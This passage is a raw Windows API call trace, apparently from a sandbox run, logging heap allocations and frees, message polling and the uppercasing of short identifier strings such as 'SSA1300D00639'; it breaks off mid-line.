RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0260.005] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0260.005] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.005] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.005] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.005] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0260.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.006] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.006] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.006] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.007] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.007] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.007] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.007] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.008] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.008] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.008] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.009] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.009] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0260.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0260.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0260.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0260.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.011] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0260.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0260.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0260.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0260.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0260.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0260.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0260.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0260.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0260.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0260.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.014] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0260.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0260.015] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.015] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0260.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.016] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.016] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 